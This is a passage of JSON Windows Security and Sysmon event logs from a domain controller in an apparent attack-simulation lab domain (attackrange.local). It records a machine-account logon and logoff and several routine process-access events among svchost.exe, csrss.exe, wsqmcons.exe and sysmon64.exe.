requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x119215","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"55056","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220722,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x119215\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x119215","LogonType":"3","EventReceivedTime":"2020-08-01 06:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7800,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7801,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7802,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2156\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-0010E1C11000}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\System32\\wsqmcons.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2156","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-0010E1C11000}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\System32\\wsqmcons.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7803,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-0010E1C11000}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\System32\\wsqmcons.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-0010E1C11000}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\System32\\wsqmcons.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7804,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7805,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7806,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7807,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 